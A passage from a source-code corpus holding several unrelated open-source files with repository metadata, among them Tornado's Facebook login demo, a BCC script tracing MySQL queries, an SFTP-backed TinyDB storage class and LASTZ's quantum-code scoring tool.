function and has self.waveform_arguments added to it.
"""
if not isinstance(parameters, dict):
raise TypeError('"parameters" must be a dictionary.')
new_parameters = parameters.copy()
new_parameters, _ = self.parameter_conversion(new_parameters)
for key in self.source_parameter_keys.symmetric_difference(
new_parameters):
new_parameters.pop(key)
self.__parameters = new_parameters
self.__parameters.update(self.waveform_arguments)
def __parameters_from_source_model(self):
"""
Infer the named arguments of the source model.
Returns
-------
set: The names of the arguments of the source model.
"""
if self.frequency_domain_source_model is not None:
model = self.frequency_domain_source_model
elif self.time_domain_source_model is not None:
model = self.time_domain_source_model
else:
raise AttributeError('Either time or frequency domain source '
'model must be provided.')
return set(utils.infer_parameters_from_function(model))
def _default_parameter_conversion(parmeters):
return parmeters, list()
| 44.20082 | 120 | 0.647288 |
ace0705fc79f0ba48105a5c7792ffee412c56b87 | 4,413 | py | Python | demos/facebook/facebook.py | billychou/tornado | 1ecc7386da17df3f1dfd100845355f7211119a62 | [
"Apache-2.0"
] | 184 | 2015-11-18T16:11:18.000Z | 2021-12-27T06:22:23.000Z | demos/facebook/facebook.py | billychou/tornado | 1ecc7386da17df3f1dfd100845355f7211119a62 | [
"Apache-2.0"
] | 17 | 2015-11-30T15:18:37.000Z | 2022-02-11T03:37:50.000Z | demos/facebook/facebook.py | billychou/tornado | 1ecc7386da17df3f1dfd100845355f7211119a62 | [
"Apache-2.0"
] | 84 | 2015-12-16T01:19:50.000Z | 2022-03-10T05:52:06.000Z | #!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os.path
import tornado.auth
import tornado.escape
import tornado.httpserver
import tornado.ioloop
import tornado.options
import tornado.web
from tornado.options import define, options
define("port", default=8888, help="run on the given port", type=int)
define("facebook_api_key", help="your Facebook application API key", type=str)
define("facebook_secret", help="your Facebook application secret", type=str)
class Application(tornado.web.Application):
def __init__(self):
handlers = [
(r"/", MainHandler),
(r"/auth/login", AuthLoginHandler),
(r"/auth/logout", AuthLogoutHandler),
]
settings = dict(
cookie_secret="__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__",
login_url="/auth/login",
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
xsrf_cookies=True,
facebook_api_key=options.facebook_api_key,
facebook_secret=options.facebook_secret,
ui_modules={"Post": PostModule},
debug=True,
autoescape=None,
)
tornado.web.Application.__init__(self, handlers, **settings)
class BaseHandler(tornado.web.RequestHandler):
def get_current_user(self):
user_json = self.get_secure_cookie("fbdemo_user")
if not user_json: return None
return tornado.escape.json_decode(user_json)
class MainHandler(BaseHandler, tornado.auth.FacebookGraphMixin):
@tornado.web.authenticated
@tornado.web.asynchronous
def get(self):
self.facebook_request("/me/home", self._on_stream,
access_token=self.current_user["access_token"])
def _on_stream(self, stream):
if stream is None:
# Session may have expired
self.redirect("/auth/login")
return
self.render("stream.html", stream=stream)
class AuthLoginHandler(BaseHandler, tornado.auth.FacebookGraphMixin):
@tornado.web.asynchronous
def get(self):
my_url = (self.request.protocol + "://" + self.request.host +
"/auth/login?next=" +
tornado.escape.url_escape(self.get_argument("next", "/")))
if self.get_argument("code", False):
self.get_authenticated_user(
redirect_uri=my_url,
client_id=self.settings["facebook_api_key"],
client_secret=self.settings["facebook_secret"],
code=self.get_argument("code"),
callback=self._on_auth)
return
self.authorize_redirect(redirect_uri=my_url,
client_id=self.settings["facebook_api_key"],
extra_params={"scope": "read_stream"})
def _on_auth(self, user):
if not user:
raise tornado.web.HTTPError(500, "Facebook auth failed")
self.set_secure_cookie("fbdemo_user", tornado.escape.json_encode(user))
self.redirect(self.get_argument("next", "/"))
class AuthLogoutHandler(BaseHandler, tornado.auth.FacebookGraphMixin):
def get(self):
self.clear_cookie("fbdemo_user")
self.redirect(self.get_argument("next", "/"))
class PostModule(tornado.web.UIModule):
def render(self, post):
return self.render_string("modules/post.html", post=post)
def main():
tornado.options.parse_command_line()
if not (options.facebook_api_key and options.facebook_secret):
print("--facebook_api_key and --facebook_secret must be set")
return
http_server = tornado.httpserver.HTTPServer(Application())
http_server.listen(options.port)
tornado.ioloop.IOLoop.current().start()
if __name__ == "__main__":
main()
| 35.58871 | 79 | 0.662588 |
ace070625d7bb177a5fd33fd674131cd6f0b9e49 | 560 | py | Python | packages/python/plotly/plotly/validators/indicator/gauge/axis/_tickmode.py | mastermind88/plotly.py | efa70710df1af22958e1be080e105130042f1839 | [
"MIT"
] | null | null | null | packages/python/plotly/plotly/validators/indicator/gauge/axis/_tickmode.py | mastermind88/plotly.py | efa70710df1af22958e1be080e105130042f1839 | [
"MIT"
] | null | null | null | packages/python/plotly/plotly/validators/indicator/gauge/axis/_tickmode.py | mastermind88/plotly.py | efa70710df1af22958e1be080e105130042f1839 | [
"MIT"
] | null | null | null | import _plotly_utils.basevalidators
class TickmodeValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self, plotly_name="tickmode", parent_name="indicator.gauge.axis", **kwargs
):
super(TickmodeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "plot"),
implied_edits=kwargs.pop("implied_edits", {}),
values=kwargs.pop("values", ["auto", "linear", "array"]),
**kwargs,
)
| 35 | 82 | 0.635714 |
ace070ce0f4dec74dc348e23e2383570784574f6 | 105 | py | Python | aiosubpub/__init__.py | sander76/pypubsub | 7563abea960fc31f2aa7d05e87a3b798cc453793 | [
"MIT"
] | 1 | 2020-05-02T06:06:30.000Z | 2020-05-02T06:06:30.000Z | aiosubpub/__init__.py | sander76/pypubsub | 7563abea960fc31f2aa7d05e87a3b798cc453793 | [
"MIT"
] | null | null | null | aiosubpub/__init__.py | sander76/pypubsub | 7563abea960fc31f2aa7d05e87a3b798cc453793 | [
"MIT"
] | 1 | 2022-02-06T10:11:30.000Z | 2022-02-06T10:11:30.000Z | """Aio sub pub package."""
from .aiosubpub import Channel, Subscription # noqa
__version__ = "1.0.10"
| 17.5 | 52 | 0.695238 |
ace07150da351a5a490980c6e6f043517194fe81 | 1,696 | py | Python | examples/tracing/mysqld_query.py | gtataranni/bcc | b090f5f9eee62796829184ec862e3378a3b7e425 | [
"Apache-2.0"
] | 58 | 2015-08-28T08:46:35.000Z | 2022-02-27T14:31:55.000Z | examples/tracing/mysqld_query.py | gtataranni/bcc | b090f5f9eee62796829184ec862e3378a3b7e425 | [
"Apache-2.0"
] | 1 | 2020-01-23T13:20:33.000Z | 2020-01-23T13:20:33.000Z | examples/tracing/mysqld_query.py | gtataranni/bcc | b090f5f9eee62796829184ec862e3378a3b7e425 | [
"Apache-2.0"
] | 12 | 2017-02-28T02:50:31.000Z | 2021-07-26T17:54:07.000Z | #!/usr/bin/python
#
# mysqld_query Trace MySQL server queries. Example of USDT tracing.
# For Linux, uses BCC, BPF. Embedded C.
#
# USAGE: mysqld_query PID
#
# This uses USDT probes, and needs a MySQL server with -DENABLE_DTRACE=1.
#
# Copyright 2016 Netflix, Inc.
# Licensed under the Apache License, Version 2.0 (the "License")
from __future__ import print_function
from bcc import BPF, USDT
from bcc.utils import printb
import sys
if len(sys.argv) < 2:
print("USAGE: mysqld_latency PID")
exit()
pid = sys.argv[1]
debug = 0
# load BPF program
bpf_text = """
#include <uapi/linux/ptrace.h>
int do_trace(struct pt_regs *ctx) {
uint64_t addr;
char query[128];
/*
* Read the first argument from the query-start probe, which is the query.
* The format of this probe is:
* query-start(query, connectionid, database, user, host)
* see: https://dev.mysql.com/doc/refman/5.7/en/dba-dtrace-ref-query.html
*/
bpf_usdt_readarg(1, ctx, &addr);
bpf_probe_read(&query, sizeof(query), (void *)addr);
bpf_trace_printk("%s\\n", query);
return 0;
};
"""
# enable USDT probe from given PID
u = USDT(pid=int(pid))
u.enable_probe(probe="query__start", fn_name="do_trace")
if debug:
print(u.get_text())
print(bpf_text)
# initialize BPF
b = BPF(text=bpf_text, usdt_contexts=[u])
# header
print("%-18s %-16s %-6s %s" % ("TIME(s)", "COMM", "PID", "QUERY"))
# format output
while 1:
try:
(task, pid, cpu, flags, ts, msg) = b.trace_fields()
except ValueError:
print("value error")
continue
except KeyboardInterrupt:
exit()
printb(b"%-18.9f %-16s %-6d %s" % (ts, task, pid, msg))
| 25.69697 | 78 | 0.649764 |
ace0721a88f5c5b0b19cf6b44fb6f39ab867df29 | 6,268 | py | Python | ikalog/outputs/hue.py | joythegreat/IkaLog | 541eb9e910829e2247409f65aa0e684667614403 | [
"Apache-2.0"
] | null | null | null | ikalog/outputs/hue.py | joythegreat/IkaLog | 541eb9e910829e2247409f65aa0e684667614403 | [
"Apache-2.0"
] | null | null | null | ikalog/outputs/hue.py | joythegreat/IkaLog | 541eb9e910829e2247409f65aa0e684667614403 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# IkaLog
# ======
# Copyright (C) 2015 Takeshi HASEGAWA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import traceback
import math
from ikalog.utils import *
# Needed in GUI mode
try:
import wx
except:
pass
# IkaOutput_Hue: "Cameleon" Phillips Hue Lights.
#
class Hue(object):
def apply_ui(self):
self.enabled = self.checkEnable.GetValue()
self.editHost = self.editHueHost.GetValue()
self.dir = self.editHueUsername.GetValue()
def refresh_ui(self):
self._internal_update = True
self.checkEnable.SetValue(self.enabled)
if not self.hueHost is None:
self.editHueHost.SetValue(self.hueHost)
else:
self.editHueHost.SetValue('')
if not self.hueUsername is None:
self.editHueUsername.SetValue(self.hueUsername)
else:
self.editHueUsername.SetValue('')
def on_config_reset(self, context=None):
self.enabled = False
self.hueHost = ''
self.hueUsername = ''
def on_config_load_from_context(self, context):
self.on_config_reset(context)
try:
conf = context['config']['hue']
except:
conf = {}
if 'Enable' in conf:
self.enabled = conf['Enable']
if 'HueHost' in conf:
self.hueHost = conf['HueHost']
if 'HueHost' in conf:
self.hueUsername = conf['HueUsername']
self.refresh_ui()
return True
def on_config_save_to_context(self, context):
context['config']['hue'] = {
'Enable': self.enabled,
'HueHost': self.hueHost,
'HueUsername': self.hueUsername,
}
def on_config_apply(self, context):
self.apply_ui()
def on_option_tab_create(self, notebook):
self.panel = wx.Panel(notebook, wx.ID_ANY, size=(640, 360))
self.page = notebook.InsertPage(0, self.panel, 'Hue')
self.layout = wx.BoxSizer(wx.VERTICAL)
self.panel.SetSizer(self.layout)
self.checkEnable = wx.CheckBox(self.panel, wx.ID_ANY, u'Hue と連携')
self.editHueHost = wx.TextCtrl(self.panel, wx.ID_ANY, u'hoge')
self.editHueUsername = wx.TextCtrl(self.panel, wx.ID_ANY, u'hoge')
try:
layout = wx.GridSizer(2, 2)
except:
layout = wx.GridSizer(2)
layout.Add(wx.StaticText(self.panel, wx.ID_ANY, u'ホスト'))
layout.Add(self.editHueHost)
layout.Add(wx.StaticText(self.panel, wx.ID_ANY, u'ユーザ'))
layout.Add(self.editHueUsername)
self.layout.Add(self.checkEnable)
self.layout.Add(layout)
# enhance_color and rgb2xy is imported from:
# https://gist.githubusercontent.com/error454/6b94c46d1f7512ffe5ee/raw/73b190ce256c3d8dd540cc34e6dae43848cbce4c/gistfile1.py
# All the rights belongs to the author.
def enhance_color(self, normalized):
if normalized > 0.04045:
return math.pow((normalized + 0.055) / (1.0 + 0.055), 2.4)
else:
return normalized / 12.92
def rgb2xy(self, r, g, b):
r_norm = r / 255.0
g_norm = g / 255.0
b_norm = b / 255.0
r_final = self.enhance_color(r_norm)
g_final = self.enhance_color(g_norm)
b_final = self.enhance_color(b_norm)
x = r_final * 0.649926 + g_final * 0.103455 + b_final * 0.197109
y = r_final * 0.234327 + g_final * 0.743075 + b_final * 0.022598
z = r_final * 0.000000 + g_final * 0.053077 + b_final * 1.035763
if x + y + z == 0:
return (0, 0)
else:
x_final = x / (x + y + z)
y_final = y / (x + y + z)
return (x_final, y_final)
def light_team_color(self, context):
if not ('team_color_bgr' in context['game']):
return
if self.hue_bridge is None:
return
team1 = context['game']['team_color_bgr'][0]
team2 = context['game']['team_color_bgr'][1]
# print(team1, team2)
c1 = self.rgb2xy(team1[2], team1[1], team1[0])
c2 = self.rgb2xy(team2[2], team2[1], team2[0])
b1 = (team1[2] * 3 + team1[0] + team1[1] * 3) / 6 / 2
b2 = (team2[2] * 3 + team2[0] + team2[1] * 3) / 6 / 2
self.hue_bridge.lights(1, 'state', xy=c1, bri=255, sat=255)
self.hue_bridge.lights(2, 'state', xy=c2, bri=255, sat=255)
def on_frame_next(self, context):
if context['engine']['inGame']:
self.light_team_color(context)
def check_import(self):
try:
import qhue
except:
print("モジュール qhue がロードできませんでした。 Hue 連携ができません。")
#print("インストールするには以下のコマンドを利用してください。\n pip install fluent-logger\n")
##
# Constructor
# @param self The Object Pointer.
# @param tag tag
# @param username Username of the player.
# @param host Fluentd host if Fluentd is on a different node
# @param port Fluentd port
# @param username Name the bot use on Slack
#
def __init__(self, host=None, user=None):
self.enabled = (not host is None)
if not (host and user):
self.hue_bridge = None
return None
self.check_import()
import qhue
try:
self.hue_bridge = qhue.Bridge(host, user)
except:
IkaUtils.dprint('%s: Exception.' % self)
IkaUtils.dprint(traceback.format_exc())
if __name__ == "__main__":
obj = Hue(host='192.168.44.87', user='newdeveloper')
context = {
'game': {
'inGame': True,
'color': [[255, 0, 0], [0, 255, 0]],
}
}
obj.light_team_color(context)
| 29.566038 | 128 | 0.592214 |
ace0728f5e597313028aa614bd21aea0f405c2b9 | 115 | py | Python | katas/beta/round_to_next_5.py | the-zebulan/CodeWars | 1eafd1247d60955a5dfb63e4882e8ce86019f43a | [
"MIT"
] | 40 | 2016-03-09T12:26:20.000Z | 2022-03-23T08:44:51.000Z | katas/beta/round_to_next_5.py | akalynych/CodeWars | 1eafd1247d60955a5dfb63e4882e8ce86019f43a | [
"MIT"
] | null | null | null | katas/beta/round_to_next_5.py | akalynych/CodeWars | 1eafd1247d60955a5dfb63e4882e8ce86019f43a | [
"MIT"
] | 36 | 2016-11-07T19:59:58.000Z | 2022-03-31T11:18:27.000Z | def round_to_next5(n):
# return (n + 4) / 5 * 5
q, r = divmod(n, 5)
return n if not r else (q + 1) * 5
| 23 | 38 | 0.504348 |
ace07298386996cce95eadffba0093438bc2c480 | 2,190 | py | Python | casket/sftp_storage.py | emanjavacas/casket | 3edf2ec41c725adbb9a66532fb56a53a7e457f94 | [
"MIT"
] | null | null | null | casket/sftp_storage.py | emanjavacas/casket | 3edf2ec41c725adbb9a66532fb56a53a7e457f94 | [
"MIT"
] | null | null | null | casket/sftp_storage.py | emanjavacas/casket | 3edf2ec41c725adbb9a66532fb56a53a7e457f94 | [
"MIT"
] | null | null | null | # coding: utf-8
import os
import json
from getpass import getpass
from paramiko import SSHClient, AutoAddPolicy
from tinydb import Storage
class WrongPathException(Exception):
pass
def parse_url(url):
"""
Extracts username, host and filename from a scp like url.
>>> parse_url('johndoe@localhost:~/filename.txt')
('johndoe', 'localhost', '~/filename.txt')
"""
if '@' not in url:
raise WrongPathException("Bad url format: missing host")
username, url = url.split("@")
if not username:
raise WrongPathException("Couldn't parse url: missing username")
host, filename = url.split(':')
return username, host, filename
def find_home(ssh):
stdin, stdout, stderr = ssh.exec_command("echo $HOME")
return stdout.readlines()[0].strip()
class SFTPStorage(Storage):
def __init__(self, path, password=None, policy='default', **kwargs):
self.username, self.host, self.path = parse_url(path)
self.kwargs = kwargs
ssh = SSHClient()
ssh.load_system_host_keys()
if policy == 'autoadd':
ssh.set_missing_host_key_policy(AutoAddPolicy())
password = password or getpass(
'Password for %s@%s: ' % (self.username, self.host))
ssh.connect(self.host, username=self.username, password=password)
self.ssh = ssh
self.sftp = ssh.open_sftp()
if self.path.startswith('~'):
self.path = os.path.join(find_home(self.ssh), self.path[2:])
self.sftp.open(self.path, mode='a').close()
self._handle = self.sftp.open(self.path, mode='r+')
def read(self):
self._handle.seek(0, 2)
size = self._handle.tell()
if not size:
return None
else:
self._handle.seek(0)
return json.loads(self._handle.read().decode('utf-8'))
def write(self, data):
self._handle.seek(0)
serialized = json.dumps(data, **self.kwargs)
self._handle.write(serialized)
self._handle.flush()
self._handle.truncate(self._handle.tell())
def close(self):
self._handle.close()
self.ssh.close()
self.sftp.close()
| 29.594595 | 73 | 0.620548 |
ace073263d1f18f604e66ad546bf30682685fbb6 | 14,066 | py | Python | externalTools/lastz-distrib-1.03.54/tools/qcode_to_scores.py | ComparativeGenomicsToolkit/cPecan | af9c59789e997d7a38723e567cc4c62394679cdd | [
"MIT"
] | null | null | null | externalTools/lastz-distrib-1.03.54/tools/qcode_to_scores.py | ComparativeGenomicsToolkit/cPecan | af9c59789e997d7a38723e567cc4c62394679cdd | [
"MIT"
] | null | null | null | externalTools/lastz-distrib-1.03.54/tools/qcode_to_scores.py | ComparativeGenomicsToolkit/cPecan | af9c59789e997d7a38723e567cc4c62394679cdd | [
"MIT"
] | 1 | 2017-03-10T21:14:37.000Z | 2017-03-10T21:14:37.000Z | #!/usr/bin/env python3
"""
Convert quantum-code files to a LASTZ scores file
-------------------------------------------------
Given background probabilities, probabilities of each DNA substitution event,
and one (or two) quantum code files, we create a log-odds scoring matrix
suitable for LASTZ.
Typical command line:
qcode_to_scores --scaleto=100 \
A:.26585 C:.23415 G:.23415 T:.26585 \ <--- background probabilties
AA:.18204 AC:.01903 AG:.04510 AT:.01967 \
CA:.01903 CC:.15508 CG:.01495 CT:.04510 \ <--- substitution probabilties
GA:.04510 GC:.01495 GG:.15508 GT:.01903 \
TA:.01967 TC:.04510 TG:.01903 TT:.18204 \
--code.target=<codefile> --code.query=<codefile>
An equivalent command line that takes advantage of the usual symmetry:
qcode_to_scores --scaleto=100 \
--symmetric \
A:.26585 C:.23415 \ <--- background probabilties
AA:.18204 AC:.01903 AG:.04510 AT:.01967 \ <--- substitution probabilties
CC:.15508 CG:.01495 \
--code.target=<codefile> --code.query=<codefile>
Quantum code files look something like the one below. Each row represents a
quantum symbol. The first value is the code value, either a single ascii
character or a two character hex value. The remaining four values are the
probability of that symbol being A, C, G, or T. Lines beginning with a # are
comments, and anything other than five columns is an error.
# p(A) p(C) p(G) p(T)
01 0.125041 0.080147 0.100723 0.694088
02 0.111162 0.053299 0.025790 0.809749
03 0.065313 0.007030 0.004978 0.922679
...
:Author: Bob Harris (rsharris@bx.psu.edu)
"""
import sys
from math import log
def usage(s=None):
message = """
qcode_to_scores [options] > lastz_score_file
--scaleto=<max> scale scores to give desired max
--symmetric map probabilities symmetrically
--hoxd70 use HOXD70 (lastz default scores) for probabilities
--code.target=<codefile> specify the quantum code for rows (LASTZ target)
--code.query=<codefile> specify the quantum code for columns (LASTZ query)
--code=<codefile> specify the quantum code for both rows *and* columns
--creator=<string> set name of creator to write as a comment in output
--nocreator inhibit creator comment in output
<base>.target:<prob> set target background probability of a nucleotide
<base>.query:<prob> set query background probability of a nucleotide
<base>:<prob> set background probability of a nucleotide for *both*
target and query
<basepair>:<prob> set basepair substitution probability; first base is
for target, second for query
"""
if (s == None): sys.exit (message)
else: sys.exit ("%s\n%s" % (s,message))
bases = ["A","C","G","T"]
basePairs = ["AA","AC","AG","AT",
"CA","CC","CG","CT",
"GA","GC","GG","GT",
"TA","TC","TG","TT"]
baseSymmetries = [["A","T"],["C","G"]]
pairSymmetries = [["AA","TT"],["CC","GG"],["AT","TA"],["CG","GC"],
["AC","CA","GT","TG"],["AG","GA","CT","TC"]]
hoxd70 = [("A", .26585),("C", .23415),
("AA",.18204),("AC",.01903),("AG",.04510),("AT",.01967),
("CC",.15508),("CG",.01495)]
def main():
##########
# parse the command line
##########
rProb = {}
cProb = {}
rcProb = {}
scaleTo = None
symmetric = False
dnaQuery = True
symbols = []
settings = []
rowCodeName = None
colCodeName = None
creator = "qcode_to_scores"
debug = []
args = sys.argv[1:]
while (len(args) > 0):
arg = args.pop(0)
val = None
fields = arg.split("=",1)
if (len(fields) == 2):
arg = fields[0]
val = fields[1]
if (val == ""):
usage("missing a value in %s=" % arg)
if (arg == "--scaleto") and (val != None):
try: scaleTo = int(val)
except ValueError: scaleTo = float(val)
elif (arg == "--symmetric") and (val == None):
symmetric = True
elif (arg == "--nodna") and (val == None):
dnaQuery = False
elif (arg == "--dnarows") and (val == None):
rowsAreDNA = True
elif (arg in ["--dnacols","--dnacolumns"]) and (val == None):
colsAreDNA = True
elif (arg in ["--hoxd70","--HOXD70"]) and (val == None):
symmetric = True
for (s,p) in hoxd70:
assert (s not in rProb) and (s not in cProb), \
"duplicate DNA event: %s" % s
rProb[s] = cProb[s] = p
elif (arg in ["--code.row","--code.target"]) and (val != None):
assert (rowCodeName == None), \
"can't have more than one row/target code"
rowCodeName = val
elif (arg in ["--code.column","--code.col","--code.query"]) and (val != None):
assert (colCodeName == None), \
"can't have more than one column/target code"
colCodeName = val
elif (arg == "--code") and (val != None):
assert (rowCodeName == None), \
"can't have more than one row/target code"
assert (colCodeName == None), \
"can't have more than one column/target code"
rowCodeName = colCodeName = val
elif (arg == "--nocreator") and (val == None):
creator = None
elif (arg == "--creator") and (val != None):
creator = val
elif (arg == "--debug") and (val != None):
debug.append(val)
elif (arg == "--debug") and (val == None):
debug.append("debug")
elif (arg.startswith("--")) and (val != None):
settings += [(arg[2:],val)]
elif (arg.startswith("--")):
usage("unknown argument: %s" % arg)
elif (val == None) and (":" in arg):
(s,which,p) = dna_event(arg)
if (which == "target"): w = "row"
elif (which == "query"): w = "col"
elif (which == "column"): w = "col"
else: w = which
assert (w in ["row","col",None]), \
"can't decipher \"%s\" (in %s)" % (which,arg)
if (w == "row"):
assert (s in bases), \
"can't specify %s for %s (in %s)" % (which,s,arg)
assert (s not in rProb), \
"duplicate DNA event: %s.target" % s
rProb[s] = p
elif (w == "col"):
assert (s in bases), \
"can't specify %s for %s (in %s)" % (which,s,arg)
assert (s not in cProb), \
"duplicate DNA event: %s.query" % s
cProb[s] = p
elif (s in bases):
assert (s not in rProb) and (s not in cProb), \
"duplicate DNA event: %s" % s
rProb[s] = cProb[s] = p
else:
assert (s not in rcProb), \
"duplicate DNA pair event: %s" % s
rcProb[s] = p
else:
usage("unknown argument: %s" % arg)
##########
# sanity check
##########
if (symmetric):
conProb = {}
for nuc in bases:
if (nuc in rProb) and (nuc not in cProb):
conProb[nuc] = rProb[nuc]
elif (nuc in cProb) and (nuc not in rProb):
conProb[nuc] = cProb[nuc]
elif (nuc in cProb) and (nuc in rProb):
assert (rProb[nuc] == cProb[nuc]), \
"can't use --symmetric with %s.target != %s.query" \
% (nuc,nuc)
conProb[nuc] = rProb[nuc]
for group in baseSymmetries:
present = len([x for x in group if (x in conProb)])
assert (present == 1), \
"need a probability for exactly one of %s" \
% (",".join(group))
val = None
for x in group:
if (x in conProb):
val = conProb[x]
break
for x in group:
if (x not in conProb): conProb[x] = val
rProb = cProb = conProb
for group in pairSymmetries:
present = len([x for x in group if (x in rcProb)])
assert (present == 1), \
"need a probability for exactly one of %s" \
% (",".join(group))
val = None
for x in group:
if (x in rcProb):
val = rcProb[x]
break
for x in group:
if (x not in rcProb): rcProb[x] = val
for nuc in bases:
assert (nuc in rProb), \
"need a target probability for %s" % nuc
assert (nuc in cProb), \
"need a query probability for %s" % nuc
for xy in basePairs:
assert (xy in rcProb), \
"need a probability for %s" % (xy)
p = sum([rProb[nuc] for nuc in bases])
assert (abs(p-1) < .00001), \
"target base probabilities sum to %f" % p
p = sum([cProb[nuc] for nuc in bases])
assert (abs(p-1) < .00001), \
"query base probabilities sum to %f" % p
p = sum([rcProb[yx] for yx in basePairs])
assert (abs(p-1) < .00001), \
"base pair probabilities sum to %f" % p
##########
# read code files
##########
# read row code
if (rowCodeName == None):
rowCode = simple_dna_quantum_code()
else:
rowCode = read_quantum_code(rowCodeName)
if (".order" in rowCode):
rowSymbols = rowCode[".order"]
else:
rowSymbols = [sym for sym in rowCode]
rowSymbols.sort()
# read column code
if (colCodeName == None):
colCode = simple_dna_quantum_code()
elif (colCodeName == rowCodeName):
colCode = rowCode
else:
colCode = read_quantum_code(colCodeName)
if (".order" in colCode):
colSymbols = colCode[".order"]
else:
colSymbols = [sym for sym in colCode]
colSymbols.sort()
##########
# print what we got
##########
if ("debug" in debug):
print("target" \
+ " ".join([" %s:%.5f" % (nuc,rProb[nuc]) for nuc in bases]))
print("query" \
+ " ".join([" %s:%.5f" % (nuc,cProb[nuc]) for nuc in bases]))
for y in bases:
print(" ".join(["%s:%.5f" % (y+x,rcProb[y+x]) for x in bases]))
##########
# assign scores
##########
sub = {}
maxSub = None
for row in rowSymbols:
u = rowCode[row]
sub[row] = {}
for col in colSymbols:
v = colCode[col]
numer = sum([u[y]*v[x]*rcProb[y+x] for (y,x) in basePairs])
denom = sum([u[y]*v[x]*rProb[y]*cProb[x] for (y,x) in basePairs])
sub[row][col] = log (float(numer) / float(denom))
if (maxSub == None) or (sub[row][col] > maxSub):
maxSub = sub[row][col]
if (scaleTo != None):
scale = scaleTo / maxSub
for row in rowSymbols:
for col in colSymbols:
sub[row][col] *= scale
if (type(scaleTo) == int):
sub[row][col] = round(sub[row][col])
##########
# print the settings, if there are any
##########
if (creator != None):
print("# created by %s" % creator)
print()
if (settings != []):
sLen = max([len(s) for (s,val) in settings])
for (s,val) in settings:
print("%-*s = %s" % (sLen,s,val))
print()
##########
# print the substitution matrix
##########
wRow = max([len(row) for row in rowSymbols])
if (scaleTo != None) and (type(scaleTo) == int):
wCol = 4
for row in rowSymbols:
for col in colSymbols:
wCol = max(wCol,len("%d" % sub[row][col]))
print("%-*s %s" \
% (wRow," "," ".join(["%*s" % (wCol,col) for col in colSymbols])))
for row in rowSymbols:
print("%-*s %s" \
% (wRow,row,
" ".join(["%*d" % (wCol,sub[row][col]) for col in colSymbols])))
else:
wCol = 4
for row in rowSymbols:
for col in colSymbols:
wCol = max(wCol,len("%.6f" % sub[row][col]))
print("%-*s %s" \
% (wRow," "," ".join(["%*s" % (wCol,col) for col in colSymbols])))
for row in rowSymbols:
print("%-*s %s" \
% (wRow,row,
" ".join(["%*.6f" % (wCol,sub[row][col]) for col in colSymbols])))
def simple_dna_quantum_code():
symToProfile = {}
for nuc1 in bases:
symToProfile[nuc1] = {}
for nuc2 in bases:
if (nuc2 == nuc1): symToProfile[nuc1][nuc2] = 1
else: symToProfile[nuc1][nuc2] = 0
return symToProfile
def read_quantum_code(codeName):
codeF = file (codeName, "rt")
symToProfile = {}
codeNumUsed = {}
symOrder = []
lineNum = 0
for line in codeF:
lineNum += 1
line = line.strip()
if ("#" in line):
line = line.split("#",1)[0].strip()
if (line == ""):
continue
fields = line.split()
assert (len(fields) >= 5), \
"fewer than four probabilities (%s line %d)" \
% (codeName,lineNum)
assert (len(fields) <= 5), \
"more than four probabilities (%s line %d)" \
% (codeName,lineNum)
try:
sym = fields[0]
codeNum = quantum_code_num(sym)
except ValueError:
assert (False), \
"%s is not a valid quantum symbol (%s line %d)" \
% (sym,codeName,lineNum)
if (codeNum in codeNumUsed):
assert (False), \
"%s (or equivalent) appears more than once (%s line %d)" \
% (sym,codeName,lineNum)
try:
profile = {}
for ix in range(4):
p = float_or_fraction(fields[ix+1])
if (not (0 <= p <= 1)): raise ValueError
profile[bases[ix]] = p
except:
assert (False), \
"%s is a bad probability value (%s line %d)" \
% (fields[ix+1],codeName,lineNum)
symToProfile[sym] = profile
codeNumUsed[codeNum] = True
symOrder += [sym]
codeF.close ()
# sanity check
assert (len(symToProfile) >= 1), \
"%s contains no code vectors!" % codeName
for sym in symToProfile:
p = sum([symToProfile[sym][nuc] for nuc in bases])
assert (abs(p-1) < .00001), \
"probabilities for %s sum to %f (in %s)" % (sym,p,codeName)
symToProfile[".order"] = symOrder
return symToProfile
def dna_event(s):
(s,p) = s.split(":",1)
if ("." in s): (s,which) = s.split(".",1)
else: which = None
assert (valid_dna_event(s)), "invalid DNA event: %s" % s
try:
p = float_or_fraction(p)
if (not (0 <= p <= 1)): raise ValueError
except ValueError:
assert (False), "invalid probability for %s: %s" % (s,p)
return (s,which,p)
def valid_dna_event(s):
if (len(s) == 0):
return False
if (len(s) == 1):
return (s in bases)
if (len(s) == 2):
return (s[0] in bases) and (s[1] in bases)
return False
def float_or_fraction(s):
if ("/" in s):
(n,d) = s.split("/",1)
return float(n)/float(d)
else:
return float(s)
def quantum_code_num(s):
if (len(s) == 0):
raise ValueError
if (len(s) == 1):
if (0x21 <= ord(s) <= 0x7E): return ord(s)
else: raise ValueError
if (len(s) == 2):
if (s == "00"): raise ValueError
try: return int(s,16)
except: raise ValueError
raise ValueError
if __name__ == "__main__": main()
| 28.24498 | 80 | 0.565904 |
ace07419ca87c7d4673637ef5944438abd6c7018 | 3,345 | py | Python | udp-py/udp/ba/convert.py | moky/WormHole | 6b2b79274274f6764e0d519d384eb65489f4ca56 | [
"MIT"
] | 5 | 2020-05-24T03:35:00.000Z | 2021-06-05T00:27:54.000Z | udp-py/udp/ba/convert.py | moky/WormHole | 6b2b79274274f6764e0d519d384eb65489f4ca56 | [
"MIT"
